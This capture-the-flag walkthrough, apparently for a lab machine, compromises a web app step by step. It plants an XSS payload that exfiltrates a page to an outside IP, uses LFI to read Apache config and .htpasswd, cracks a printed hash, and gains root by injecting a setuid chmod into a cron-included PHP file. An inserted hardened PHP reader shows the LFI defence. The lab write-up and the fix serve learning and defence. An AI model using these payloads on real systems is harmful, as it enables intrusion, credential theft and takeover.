Foothold
1. Upload an MD file that contains an XSS payload
<script>
fetch("http://alert.htb/messages.php").then(response => response.text()).then(response => {fetch("http://10.10.14.6/?"+btoa(response))})
</script>
2. send a message that contains a link to the hosted payload
email=test%40test.com&message=<script src="http://alert.htb/visualizer.php?link_share=675155dfa06ca8.28692334.md
3. exfiltrate messages.php and see that it reads messages through a file parameter that is vulnerable to LFI
<h1>Messages</h1><ul><li><a href='messages.php?file=2024-03-10_15-48-34.txt'>2024-03-10_15-48-34.txt</a></li></ul>
4. LFI to get /etc/apache2/sites-enabled/000-default.conf
5. then LFI to get /var/www/statistics.alert.htb/.htpasswd and get albert's hash
albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
6. crack the hash with hashcat (mode 1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR))
hashcat -m 1600 hash /usr/share/wordlists/rockyou.txt
7. SSH as Albert
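A hardened reader for the messages.php?file= endpoint, as an added example that is not part of this writeup or the target's code; the messages directory path and the file-naming pattern are assumptions taken from the listing above:

```php
<?php
// Added example: messages.php that keeps ?file= from becoming an LFI.
// Assumes messages live in one directory and are named like
// 2024-03-10_15-48-34.txt (pattern taken from the listing above).
declare(strict_types=1);

const MESSAGES_DIR = '/var/www/alert.htb/messages'; // assumed location

function safe_message_path(string $requested, string $dir = MESSAGES_DIR): ?string
{
    // 1. Allow-list the name: date_time.txt only, so no slashes, "..",
    //    NUL bytes or wrappers such as php://filter can get through.
    if (!preg_match('/^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}\.txt$/', $requested)) {
        return null;
    }

    // 2. Canonicalise and confirm the result is still inside $dir
    //    (defence in depth against symlinks or a later, looser regex).
    $base = realpath($dir);
    $full = realpath($dir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $full === false) {
        return null;
    }
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $full;
}

$path = safe_message_path((string) ($_GET['file'] ?? ''));
if ($path === null) {
    http_response_code(404);
    exit('unknown message');
}

// 3. Read the file; never include() a user-chosen path. Escape on output so a
//    message body cannot inject markup into the admin's page.
echo '<h1>Message</h1><pre>'
   . htmlspecialchars(file_get_contents($path), ENT_QUOTES, 'UTF-8')
   . '</pre>';
```

Because the allow-list rejects any name with a slash, paths such as /etc/apache2/sites-enabled/000-default.conf or a .htpasswd in another vhost are refused before the filesystem is touched.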
PrivEsc
1. run pspy64 to see the cron job
/bin/sh -c /usr/bin/php -f /opt/website-monitor/monitor.php >/dev/null 2>&1
/usr/bin/php -f /opt/website-monitor/monitor.php
2. /opt/website-monitor/monitor.php includes config/configuration.php
3. we can edit config/configuration.php and add:
system('chmod +s /bin/bash')
4. get root